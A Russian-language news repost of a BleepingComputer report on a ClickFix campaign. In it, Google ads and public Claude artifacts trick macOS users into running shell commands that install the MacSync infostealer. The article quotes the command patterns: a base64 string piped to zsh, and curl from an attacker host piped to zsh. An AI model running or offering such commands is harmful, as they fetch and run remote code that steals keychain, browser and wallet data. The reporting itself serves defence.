Добавить в корзинуПозвонить
Найти в Дзене
DigiNews

Артефакты Claude LLM используются для распространения инфостилеров под Mac в ходе атак ClickFix

Злоумышленники используют артефакты Claude и Google Ads в кампаниях ClickFix, доставляя вредоносное ПО типа infostealer пользователям macOS. Обнаружено более 10 000 заражений. Исследователи предупреждают о рисках выполнения неизвестных команд в Терминале. — bleepingcomputer.com Злоумышленники используют артефакты Claude и Google Ads в рамках кампаний ClickFix, доставляя вредоносное ПО типа infostealer пользователям macOS, которые ищут определенные запросы. В дикой природе были замечены как минимум два варианта вредоносной активности, и более 10 000 пользователей получили доступ к контенту с опасными инструкциями. Артефакт Claude — это контент, сгенерированный большой языковой моделью (LLM) Antropic, который автор сделал общедоступным. Это могут быть инструкции, руководства, фрагменты кода или другие типы выходных данных, изолированные от основного чата и доступные любому через ссылки, размещенные в домене claude.ai. На странице артефакта пользователей предупреждают, что показанный конт

Злоумышленники используют артефакты Claude и Google Ads в кампаниях ClickFix, доставляя вредоносное ПО типа infostealer пользователям macOS. Обнаружено более 10 000 заражений. Исследователи предупреждают о рисках выполнения неизвестных команд в Терминале. — bleepingcomputer.com

Злоумышленники используют артефакты Claude и Google Ads в рамках кампаний ClickFix, доставляя вредоносное ПО типа infostealer пользователям macOS, которые ищут определенные запросы.

В дикой природе были замечены как минимум два варианта вредоносной активности, и более 10 000 пользователей получили доступ к контенту с опасными инструкциями.

Артефакт Claude — это контент, сгенерированный большой языковой моделью (LLM) Antropic, который автор сделал общедоступным. Это могут быть инструкции, руководства, фрагменты кода или другие типы выходных данных, изолированные от основного чата и доступные любому через ссылки, размещенные в домене claude.ai.

На странице артефакта пользователей предупреждают, что показанный контент был сгенерирован пользователем и не был проверен на точность.

Исследователи из следственного подразделения MacPaw, Moonlock Lab, а также из компании AdGuard, занимающейся блокировкой рекламы, заметили вредоносные результаты поиска, отображаемые по множеству запросов, таких как «online DNS resolver», «macOS CLI disk space analyzer» и «HomeBrew».

-2

Вредоносные результаты, продвигаемые в Google Поиске, ведут либо к общедоступному артефакту Claude, либо к статье на Medium, выдающей себя за службу поддержки Apple. В обоих случаях пользователю предлагается вставить команду оболочки в Терминал.

  • В первом варианте атаки команда для выполнения: ‘echo "..." | base64 -D | zsh,’
  • во втором: ‘true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh’.
-3

Исследователи Moonlock обнаружили, что вредоносное руководство Claude уже получило как минимум 15 600 просмотров, что может указывать на количество пользователей, попавшихся на уловку.

Исследователи AdGuard наблюдали то же руководство за несколько дней до этого, когда оно имело 12 300 просмотров.

-4

Выполнение команды в Терминале загружает загрузчик вредоносного ПО для инфостилера MacSync, который крадет конфиденциальную информацию из системы. По словам исследователей, вредоносное ПО устанавливает связь с инфраструктурой командно-контрольного центра (C2) с использованием жестко закодированного токена и ключа API, а также подменяет user-agent браузера macOS, чтобы слиться с обычным трафиком.

«Ответ передается напрямую в osascript — AppleScript обрабатывает фактическое хищение (связка ключей, данные браузера, криптокошельки)», — говорят исследователи.

Украденные данные упаковываются в архив в `/tmp/osalogging.zip`, а затем передаются на C2 злоумышленника по адресу a2abotnet[.]com/gate через HTTP POST-запрос. В случае сбоя архив разбивается на более мелкие части, и попытка передачи повторяется восемь раз. После успешной загрузки шаг очистки удаляет все следы.

MoonLock Lab обнаружила, что оба варианта загружают вторую стадию с одного и того же адреса C2, что указывает на то, что за наблюдаемой активностью стоит один и тот же злоумышленник.

Аналогичная кампания использовала функцию обмена чатами в ChatGPT и Grok для доставки инфостилера AMOS. В декабре 2025 года исследователи обнаружили, что продвигаемые материалы были частью атак ClickFix, нацеленных на пользователей Mac, после того как было обнаружено использование чатов ChatGPT и Grok.

Вариант атаки с использованием Claude указывает на то, что злоупотребления распространились и на другие большие языковые модели (LLM).

Пользователям рекомендуется проявлять осторожность и избегать выполнения в Терминале команд, которые они не полностью понимают. Как отмечали в прошлом исследователи «Лаборатории Касперского», простой способ определить безопасность предоставленных команд — спросить об этом чат-бота в том же разговоре.

Всегда имейте в виду, что редакции могут придерживаться предвзятых взглядов в освещении новостей.

Автор – Bill Toulas

Оригинал статьи